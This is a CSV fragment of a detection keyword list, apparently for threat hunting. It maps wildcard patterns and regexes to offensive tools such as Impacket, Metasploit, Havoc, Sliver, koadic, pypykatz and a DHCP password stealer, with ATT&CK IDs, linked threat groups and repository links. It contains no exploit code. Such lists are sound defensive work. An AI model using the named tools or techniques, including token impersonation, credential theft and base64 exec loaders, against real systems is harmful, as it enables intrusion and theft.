"*ImpactDecoder*",".{0,1000}ImpactDecoder.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48320"
"*ImpactPacket*",".{0,1000}ImpactPacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48321"
"*Impersonate NT AUTHORITY\\SYSTEM to hijack session*",".{0,1000}Impersonate\sNT\sAUTHORITY\\\\SYSTEM\sto\shijack\ssession.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","48322"
"*Impersonate.exe adduser *",".{0,1000}Impersonate\.exe\sadduser\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48323"
"*Impersonate.exe exec *",".{0,1000}Impersonate\.exe\sexec\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48324"
"*Impersonate.exe list *",".{0,1000}Impersonate\.exe\slist\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48325"
"*Impersonate.exe list*",".{0,1000}Impersonate\.exe\slist.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48326"
"*impersonate_token *Administrator*",".{0,1000}impersonate_token\s.{0,1000}Administrator.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Incognito","10","10","N/A","N/A","N/A","N/A","48327"
"*impersonate_token *BUILTIN\Administrators*",".{0,1000}impersonate_token\s.{0,1000}BUILTIN\\Administrators.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48328"
"*ImpersonateAndUnload.cpp*",".{0,1000}ImpersonateAndUnload\.cpp.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","48329"
"*ImpersonateFromParentPid -ppid*",".{0,1000}ImpersonateFromParentPid\s\-ppid.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","48330"
"*ImpersonateLocalService*",".{0,1000}ImpersonateLocalService.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","48331"
"*ImpersonateLoggedOnUser worked, but thread is not running as SYSTEM*",".{0,1000}ImpersonateLoggedOnUser\sworked,\sbut\sthread\sis\snot\srunning\sas\sSYSTEM.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","48332"
"*ImpersonateLoggedOnUser worked, but thread is not running as SYSTEM*",".{0,1000}ImpersonateLoggedOnUser\sworked,\sbut\sthread\sis\snot\srunning\sas\sSYSTEM.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","48333"
"*impersonate-main.zip*",".{0,1000}impersonate\-main\.zip.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","48334"
"*impersonateprocess.py*",".{0,1000}impersonateprocess\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","48335"
"*impersonateuser.boo*",".{0,1000}impersonateuser\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","48336"
"*impersonateuser.py*",".{0,1000}impersonateuser\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","48337"
"*Impersonation #1 done.*",".{0,1000}Impersonation\s\#1\sdone\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","N/A","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","48338"
"*Impersonation #1 failed. Exiting*",".{0,1000}Impersonation\s\#1\sfailed\.\sExiting.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","N/A","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","48339"
"*Impersonation #2 done.*",".{0,1000}Impersonation\s\#2\sdone\..{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","N/A","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","48340"
"*Impersonation #2 failed. Exiting*",".{0,1000}Impersonation\s\#2\sfailed\.\sExiting.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","N/A","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","48341"
"*imperva_gzip.py*",".{0,1000}imperva_gzip\.py.{0,1000}","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","network exploitation tool","N/A","2","157","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z","48342"
"*Implant*TeamServer.exe*",".{0,1000}Implant.{0,1000}TeamServer\.exe.{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","N/A","10","10","27","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z","48343"
"*Implant.ImplantGenerator*",".{0,1000}Implant\.ImplantGenerator.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","48344"
"*implant.sleep-obf*",".{0,1000}implant\.sleep\-obf.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48345"
"*implant/elevate/*",".{0,1000}implant\/elevate\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48346"
"*implant/gather/*",".{0,1000}implant\/gather\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48347"
"*implant/inject/*",".{0,1000}implant\/inject\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48348"
"*implant/persist/*",".{0,1000}implant\/persist\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48349"
"*implant/pivot/*",".{0,1000}implant\/pivot\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","48350"
"*implant/sliver/*",".{0,1000}implant\/sliver\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","48351"
"*Implant\SleepMask*",".{0,1000}Implant\\SleepMask.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48352"
"*implant_rootkit.sh*",".{0,1000}implant_rootkit\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","48353"
"*implant-callback.*",".{0,1000}implant\-callback\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","48354"
"*Implants/powershell.ps1*",".{0,1000}Implants\/powershell\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","48355"
"*ImplantSSP.csproj*",".{0,1000}ImplantSSP\.csproj.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","48356"
"*import _eternalhush*",".{0,1000}import\s_eternalhush.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","48357"
"*import adexpsnapshot*",".{0,1000}import\sadexpsnapshot.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1087.002 - T1482 - T1083 - T1003.008","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/c3c/ADExplorerSnapshot.py","1","0","N/A","N/A","10","10","956","126","2025-03-14T16:13:41Z","2021-12-22T14:42:23Z","48358"
"*import apypykatz*",".{0,1000}import\sapypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","48359"
"*import base64,sys;exec(base64.b64decode(*",".{0,1000}import\sbase64,sys\;exec\(base64\.b64decode\(.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","4","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48360"
